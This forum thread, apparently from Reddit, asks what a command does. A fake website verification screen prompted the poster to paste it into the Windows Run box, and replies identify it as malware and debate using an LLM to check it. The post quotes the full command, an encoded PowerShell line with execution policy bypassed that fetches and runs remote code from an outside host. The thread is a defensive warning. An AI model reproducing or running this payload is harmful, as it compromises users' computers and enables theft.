What does this command do that this website wants me to "verify" myself by running in the run window?
What does this command do that this website wants me to "verify" myself by running in the run window?
Yeah don't put this in but can anyone give me an idea of what they were trying to do? the website was https:howchoo\com\3dprinting\updating-octoprint
\
and used a real pc verification screen to try to get me to put this in Run
conhost cmd /c powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcABzADoALwAvAG0AYQBzAHQAcgBhAHcALgB0AG8AcAAvAG0AZQAvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGREDACTED== /W 1
One of the moments that Ai can be good. I asked googled gemni
Edit:added back tick to urls
You needed an LLM to figure out this was malware?! Sweet jesus, we're well and truly fucked.
It did speed up the process of looking it up and confirming that it is malware.
LLMs are decent at pattern recognition, and so it pulled up relevant keywords associated with each part of the command. You can then look up the important section to verify. It's also something that a simple and locally hosted LLM could do.
I wouldn't run a random command, but confirming that it is malware would let me take further action to block the site / report it / help a family member that already ran the command
Right? Tech literacy is dead and smartphones killed it
Chill out you, we all know it was malware, but llms are actually a tool in this use case to find out more about it without executing the code.
I don't like AI anymore than the next guy but this is just a silly response
Could you surround the links with backticks to make them code blocks? That would prevent someone from accidentally clicking it
Sure, thanks for the heads up
Doesn't really matter if anyone clicks it, you would need to execute the script to be compromised.